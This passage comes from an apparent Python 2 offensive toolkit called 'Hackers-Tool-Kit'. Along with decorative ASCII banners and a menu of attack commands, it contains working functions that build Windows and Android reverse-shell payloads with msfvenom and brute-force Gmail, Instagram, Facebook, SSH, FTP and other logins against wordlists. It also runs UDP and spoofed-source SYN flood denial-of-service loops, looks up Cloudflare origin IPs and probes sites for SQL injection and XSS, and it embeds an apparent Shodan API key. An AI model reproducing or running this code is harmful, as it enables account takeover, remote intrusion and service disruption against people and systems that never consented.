▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """\033[91m +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = 